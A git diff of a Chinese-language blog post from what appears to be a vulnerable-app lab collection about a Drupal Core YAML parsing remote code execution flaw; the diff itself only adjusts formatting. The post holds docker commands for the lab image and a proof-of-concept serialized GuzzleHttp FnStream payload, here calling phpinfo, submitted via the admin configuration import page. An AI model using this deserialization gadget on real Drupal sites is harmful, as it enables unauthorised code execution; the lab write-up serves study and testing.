--- a/_posts/2017-06-29-d_drupal_1.md
+++ b/_posts/2017-06-29-d_drupal_1.md
@@ -14,7 +14,11 @@ categories:
 twitter_text: 'Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞。'
 introduction: 'Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞。'
 ---
-
+<style type="text/css">
+.highlight pre{
+  white-space: pre-wrap;
+}    
+</style>
 ### 漏洞信息
 
 Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成。Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞。
@@ -33,12 +37,12 @@ Mysql | root | root
 ### 获取环境:
 
 1. 拉取镜像到本地
- ```
+ ```bash
 $ docker pull medicean/vulapps:d_drupal_1
  ```
 
 2. 启动环境
- ```
+ ```bash
 $ docker run -d -p 8000:80 medicean/vulapps:d_drupal_1
  ```
  > `-p 8000:80` 前面的 8000 代表物理机的端口，可随意指定。 
@@ -52,15 +56,13 @@ $ docker run -d -p 8000:80 medicean/vulapps:d_drupal_1
 
 1.序列化一个`GuzzleHttp\Psr7\FnStream`类, 并给该序列化字符串加上yaml的`!php/object` tag(注意一定要转义):
 
-```
+```php
 !php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
 ```
 
 2.登录一个管理员账号，访问如下url: 
 
-```
-http://127.0.0.1:8000/admin/config/development/configuration/single/import
-```
+`http://127.0.0.1:8000/admin/config/development/configuration/single/import`
 
 然后按下图所示填写表单：
 
